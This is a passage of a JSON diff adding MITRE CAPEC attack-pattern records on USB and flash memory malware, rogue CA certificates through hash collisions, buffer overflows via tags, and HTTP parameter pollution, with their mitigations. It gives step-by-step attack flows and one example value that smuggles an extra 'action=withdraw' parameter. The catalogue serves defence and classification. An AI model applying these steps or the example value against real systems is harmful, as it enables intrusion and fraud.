"capec", + "url": "https://capec.mitre.org/data/definitions/456.html" + }, + { + "external_id": "CWE-1257", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1257.html" + }, + { + "external_id": "CWE-1260", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1260.html" + }, + { + "external_id": "CWE-1274", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1274.html" + }, + { + "external_id": "CWE-1312", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1312.html" + }, + { + "external_id": "CWE-1316", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1316.html" + } + ], + "id": "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3", + "modified": 
"2023-01-24T00:00:00.000Z", + "name": "Infected Memory", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "A USB Memory stick has malicious logic inserted before shipping of the product allowing for infection of the host machine once inserted into the USB port.", + "In 2007, approximately 1800 of Seagate's Maxtor Personal Storage 3200 drives were built under contract with an outside manufacturer and contained a virus that stole user passwords." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "attack-pattern--96c60498-fdd4-4f9f-a21f-c1a4ee84f0f3" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage anti-virus products to detect stop operations with known virus.", + "id": "course-of-action--654febd1-834c-4c6b-b928-85c97bbf9150", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-456-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66815cc1-00b2-4e7e-b397-ae5fb384441e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--654febd1-834c-4c6b-b928-85c97bbf9150", + "target_ref": "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary loads malicious code onto a USB memory stick in order to infect any system which the device is plugged in to. USB drives present a significant security risk for business and government agencies. Given the ability to integrate wireless functionality into a USB stick, it is possible to design malware that not only steals confidential data, but sniffs the network, or monitor keystrokes, and then exfiltrates the stolen data off-site via a Wireless connection. Also, viruses can be transmitted via the USB interface without the specific use of a memory stick. The attacks from USB devices are often of such sophistication that experts conclude they are not the work of single individuals, but suggest state sponsorship. 
These attacks can be performed by an adversary with direct access to a target system or can be executed via means such as USB Drop Attacks.", + "external_references": [ + { + "external_id": "CAPEC-457", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/457.html" + }, + { + "external_id": "CWE-1299", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1299.html" + }, + { + "description": "Replication Through Removable Media", + "external_id": "T1091", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1091" + }, + { + "description": "Communication Through Removable Media", + "external_id": "T1092", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1092" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + } + ], + "id": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "USB Memory Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Target System: In certain cases, the adversary will explore an organization's network to determine a specific target machine to exploit based on the information it contains or privileges the main user may possess.

  2. Techniques
    If needed, the adversary explores an organization's network to determine if any specific systems of interest exist.

Experiment

  1. Develop or Obtain malware and install on a USB device: The adversary develops or obtains the malicious software necessary to exploit the target system, which they then install on an external USB device such as a USB flash drive.

  2. Techniques
    The adversary can develop or obtain malware for to perform a variety of tasks such as sniffing network traffic or monitoring keystrokes.

Exploit

  1. Connect or deceive a user into connecting the infected USB device: Once the malware has been placed on an external USB device, the adversary connects the device to the target system or deceives a user into connecting the device to the target system such as in a USB Drop Attack.

  2. Techniques
    The adversary connects the USB device to a specified target system or performs a USB Drop Attack, hoping a user will find and connect the USB device on their own. Once the device is connected, the malware executes giving the adversary access to network traffic, credentials, etc.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Some level of physical access to the device being attacked.", + "Information pertaining to the target organization on how to best execute a USB Drop Attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that proper, physical system access is regulated to prevent an adversary from physically connecting a malicious USB device themself.", + "id": "course-of-action--28a045ca-1d19-4806-8fe8-289661aa8f3d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-457-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1223d74f-6652-40ea-92ee-4f1a2c91d676", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--28a045ca-1d19-4806-8fe8-289661aa8f3d", + "target_ref": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use anti-virus and anti-malware tools which can prevent malware from executing if it finds its way onto a target system. 
Additionally, make sure these tools are regularly updated to contain up-to-date virus and malware signatures.", + "id": "course-of-action--23616f83-6ea1-4f30-a9f5-65259313e80b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-457-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--83689bae-01f6-4ed3-b3f8-66cf8e657475", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--23616f83-6ea1-4f30-a9f5-65259313e80b", + "target_ref": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not connect untrusted USB devices to systems connected on an organizational network. 
Additionally, use an isolated testing machine to validate untrusted devices and confirm malware does not exist.", + "id": "course-of-action--c295b380-bcd9-4e87-88dc-341fc0ad6922", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-457-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dfbd2aef-9f4e-43aa-819c-14c5b16d3c23", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c295b380-bcd9-4e87-88dc-341fc0ad6922", + "target_ref": "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts malicious logic into a product or technology via flashing the on-board memory with a code-base that contains malicious logic. 
Various attacks exist against the integrity of flash memory, the most direct being rootkits coded into the BIOS or chipset of a device.", + "external_references": [ + { + "external_id": "CAPEC-458", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/458.html" + }, + { + "external_id": "CWE-1282", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1282.html" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Robert Lemos, Researchers: Rootkits headed for BIOS, 2006, SecurityFocus", + "external_id": "REF-394", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--96c60498-fdd4-4f9f-a21f-c1a4ee84f0f3", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Flash Memory Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n Such attacks are very difficult to detect because the malicious code resides outside the filesystem or RAM, and in the underlying byte-code that drives the processor. 
Many devices, such as the recent attacks against digital picture frames, contain only a microprocessor and a small amount of solid-state memory, rendering these devices ideal for \"flash\" based malware or malicious logic.\n One of the pernicious characteristics of flash memory based attacks is that the malicious code can survive even a total format of the hard-drive and reinstallation of the host operating system. Virtually any device which can be integrated into a computer system is susceptible to these attacks. Additionally, any peripheral device which interfaces with the computer bus could extract or sniff confidential data, even on systems employing full-disk encryption. Trojan code placed into a video card's chipset would continue to perform its function irrespective of the host operating system, and would be invisible to all known antivirus. The threats extend to consumer products such as camcorders, digital cameras, or any consumer electronic device with an embedded microcontroller.\n ", + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their \"to be signed\" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. 
The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority.", + "external_references": [ + { + "external_id": "CAPEC-459", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/459.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-295", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/295.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 Considered Harmful Today: Creating a Rogue CA Certificate, 2008--12---30, Phreedom.org", + "external_id": "REF-395", + "source_name": "reference_from_CAPEC", + "url": "http://www.phreedom.org/research/rogue-ca/" + }, + { + "description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 considered harmful today, 2009--12", + "external_id": "REF-587", + "source_name": "reference_from_CAPEC", + "url": "https://www.win.tue.nl/hashclash/rogue-ca/#Ref" + } + ], + "id": "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Creating a Rogue Certification Authority Certificate", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n MD5 Collisions\n The 
MD5 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.See also: CVE-2004-2761", + "\n SHA1 Collisions\n The SHA1 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.See also: CVE-2005-4900", + "\n PKI Infrastructure vulnerabilities\n Research has show significant vulnerabilities in PKI infrastructure. Trusted certificate authorities have been shown to use weak hashing algorithms after attacks have been demonstrated against those algorithms. Additionally, reliable methods have been demonstrated for generated MD5 collisions that could be used to generate malicious CSRs.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Craft Certificates: The adversary crafts two different, but valid X.509 certificates that when hashed with an insufficiently collision resistant hashing algorithm would yield the same value.

  2. Send CSR to Certificate Authority: The adversary sends the CSR for one of the certificates to the Certification Authority which uses the targeted hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the adversary which is signed with its private key.

Exploit

  1. Insert Signed Blob into Unsigned Certificate: The adversary takes the signed blob and inserts it into the second X.509 certificate that the attacker generated. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob is valid in the second certificate. The result is two certificates that appear to be signed by a valid certificate authority despite only one having been signed.

", + "x_capec_extended_description": "\n Alternatively, the second certificate could be a signing certificate. Thus the adversary is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attacker's first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will the Certificate Authority set up by the adversary and any certificates that it signs. As a result, the adversary is able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec).\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Certification Authority is using a hash function with insufficient collision resistance to generate the certificate hash to be signed" + ], + "x_capec_resources_required": [ + "Knowledge of a certificate authority that uses hashing algorithms with poor collision resistance", + "A valid certificate request and a malicious certificate request with identical hash values" + ], + "x_capec_skills_required": { + "High": "An attacker must be able to craft two X.509 certificates that produce the same hash value", + "Medium": "Knowledge needed to set up a certification authority" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Certification Authorities need to stop using deprecated or cryptographically insecure hashing algorithms to hash the certificates that they are about to sign. 
Instead they should be using stronger hashing functions such as SHA-256 or SHA-512.", + "id": "course-of-action--aef26c23-42e4-46ac-a6ce-61224191c8a3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-459-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--323c57c1-b086-4b0d-81cb-1cf8a0bb21d3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aef26c23-42e4-46ac-a6ce-61224191c8a3", + "target_ref": "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack leverages the use of tags or variables from a formatted configuration data to cause buffer overflow. 
The adversary crafts a malicious HTML page or configuration file that includes oversized strings, thus causing an overflow.", + "external_references": [ + { + "external_id": "CAPEC-46", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/46.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Overflow Variables and Tags", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A buffer overflow vulnerability exists in the Yamaha MidiPlug that can be accessed via a Text variable found in an EMBED tag.See also: CVE-1999-0946", + "\n A buffer overflow in Exim allows local users to gain root privileges by providing a long :include: option in a .forward file.See also: CVE-1999-0971" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries look for applications or programs that accept formatted files, such as configuration files, as input.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

  2. Techniques
    Knowing the type of file that an application takes as input, the adversary takes a normal input file and modifies a single variable or tag to contain a large amount of data. If there is a crash, this means that a buffer overflow attack is possible. The adversary will keep changing single variables or tags one by one until they see a change in behavior.
  3. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

  4. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: The adversary will upload the crafted file to the application, causing a buffer overflow.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e" + ], + "x_capec_prerequisites": [ + "The target program consumes user-controllable data in the form of tags or variables.", + "The target program does not perform sufficient boundary checking." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0cad5809-fa6b-4947-9d83-2c2e462c3f42", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eaa7c808-388e-4b0b-a9c7-56895d4b1188", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--45d81297-fcc7-4abb-88f9-43cae938e07e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a2abe8d6-7c9a-4465-ad34-052a868dc3b0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not trust input data from user. 
Validate all user input.", + "id": "course-of-action--4d65b6e1-548b-4925-96e0-a2948cea8f7e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-46-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--933f0265-0d58-4da3-be7f-f584f3b4b55b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4d65b6e1-548b-4925-96e0-a2948cea8f7e", + "target_ref": "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary adds duplicate HTTP GET/POST parameters by injecting query string delimiters. 
Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behaviors, access and, potentially exploit, uncontrollable variables, and bypass input validation checkpoints and WAF rules.", + "external_references": [ + { + "external_id": "CAPEC-460", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/460.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-147", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/147.html" + }, + { + "external_id": "CWE-235", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/235.html" + }, + { + "description": "Web Parameter Tampering", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Web_Parameter_Tampering" + }, + { + "description": "Luca Carettoni, Stefano di Paola, HTTP Parameter Pollution (OWASP EU09 Poland), 2008, The Open Web Application Security Project (OWASP)", + "external_id": "REF-397", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-606", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution.html" + } + ], + "id": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "modified": "2022-02-22T00:00:00.000Z", + "name": "HTTP Parameter Pollution (HPP)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e" + ], + 
"x_capec_child_of_refs": [ + "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find User Input: The adversary finds anywhere in the web application that uses user-supplied input in a form or action. This can also be found by looking at parameters in the URL in the navigation bar of the browser

Experiment

  1. Add Duplicate Parameter Values: Once the adversary has identified what user input is used as HTTP parameters, they will add duplicates to each parameter one by one to observe the results. If the response from the HTTP request shows the duplicate parameter value concatenated with the original parameter value in some way, or simply just the duplicate parameter value, then HPP is possible.

  2. Techniques
    In the URL, add a duplicate parameter by using the \"&\" delimiter. For example \"par1=val1\" becomes \"par1=val1&par1=val2\". Depending on the backend API, this could be treated as \"par1=val1, val2\", which could lead to par1 being set to val2, ignoring val1.
    If the request is created based on user input directly on the page, the adversary will test by adding an encoded delimiter to the input. For example, the adverary might supply \"1000%26action=withdraw\" and the backend might interpret a POST request with the paramters \"action=deposit&amount=1000&action=withdraw\"

Exploit

  1. Leverage HPP: Once the adversary has identified how the backend handles duplicate parameters, they will leverage this by polluting the paramters in a way that benefits them. In some cases, hardcoded parameters will be disregarded by the backend. In others, the adversary can bypass a WAF that might only check a parameter before it has been concatenated by the backend, resulting in malicious queries getting through.

